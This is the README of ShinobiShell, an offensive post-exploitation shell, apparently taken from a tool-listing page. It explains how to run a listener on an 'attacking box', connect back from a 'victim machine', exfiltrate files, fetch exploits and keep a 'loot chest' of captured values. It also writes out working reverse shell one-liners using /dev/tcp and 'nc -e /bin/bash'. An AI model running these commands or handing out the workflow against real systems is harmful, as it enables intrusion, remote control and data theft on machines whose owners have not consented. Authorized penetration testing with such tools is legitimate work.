ShinobiShell
An experimental shell that handles file exfiltration, exploit injection and various other obnoxious tasks.
Install / Use
/learn @DotNetRussell/ShinobiShellREADME
ShinobiShell
An experimental shell that handles file exfiltration, exploit injection and various other obnoxious tasks.
usage: PROG [options]
Shinobi shell is a shell specifically designed to make exfiltration, proxying,
persistance and other pentesting actions easier.
optional arguments:
-h, --help show this help message and exit
-a, --autoload Listens for a incoming shell. Then autoloads shinobi shell onto the target
-t, --ttyCheat Shows tty shell cheat sheet (need a tty shell for shinobi shell to work)
-c, --connect Flag that indicates a reverse shell connection (use this on victim machine)
-l LISTEN, --listen LISTEN
Starts Shinobi Shell listener on port passed in
-k, --key Will create an encrpyted tunnel if encrpytion libs available
-r SERVERADDRESS, --serveraddress SERVERADDRESS
Local IP Address used for universal reverse shell
handler (optional - use if different than default)
Start your server first:
Server (Attacking box)
./shinobishell.py -l 4443 -k
-l Port server will listen on
-k Requesting an encrypted tunnel server (optional but if used, required by all connections)
OPTION 1: Run Shinobi Shell manually on the victim machine
Client (Penetrated box)
./shinobishell.py -c -k
-c Connect back to a server
-k Try and make an encrytped tunnel
For both server and client, you'll be prompted for a password when using -k
For -c you will be prompted at run time for the server address
Both -c and -k were moved to runtime inputs to prevent leaking attacking machine address and key in bash history
OPTION 2: Start a Shinobi Shell listener on your attacking machine and send it a shell
Attacking Machine
./shinobishell.py -a
Shinobi Tunnel Plaintext ~~ Be aware
Which port to listen on: 1000
What is the ShinobiServer address:port combination: 127.0.0.1:443
Victim Machine
Send a reverse shell
(tested and known to work)
/bin/bash -i >& /dev/tcp/127.0.0.1/1000 0>&1
nc 127.0.0.1 1000 -e /bin/bash
nc 127.0.0.1 1000 -e /bin/sh
-h --help Help output
Shinobi Shell v1.0
Author: Anthony Russell
Contact: Twitter @DotNetRussell
Blog: https://DotNetRussell.com (don't hack me bro)
Commands:
help - displays help information
machineinfo - displays a series of machine variables to help with priv esc
searchsploit - <search text> sends a searchsploit command back to your attacking machine and returns the results through shinobi tunnel
exfil <file name> - exfiltrates a file back to your attacking machine via shinobi tunnel
ssdownload <exploit path> - downloads a search sploit exploit from your attacking machine
download <url> - does a wget for your file on your attacking machine and then transfers it to you over shinobi tunnel
linenumdownlods - linenum.sh to the Shinobi Server and then transfers it back to the client
suid3num - downloads suid3num.py to the Shinobi server and then transfers it back to the client
Loot Chest:
loot store <key> <value> - stores a key value pair in your loot chest
loot <key> - gets a loot value
loot show - shows everything in loot chest
NOTE: Loot chest auto syncs with attacking machine
Auto Aliases
lsa == ls -la
Related Skills
node-connect
349.9kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
claude-opus-4-5-migration
109.8kMigrate prompts and code from Claude Sonnet 4.0, Sonnet 4.5, or Opus 4.1 to Opus 4.5
frontend-design
109.8kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
model-usage
349.9kUse CodexBar CLI local cost usage to summarize per-model usage for Codex or Claude, including the current (most recent) model or a full model breakdown. Trigger when asked for model-level usage/cost data from codexbar, or when you need a scriptable per-model summary from codexbar cost JSON.
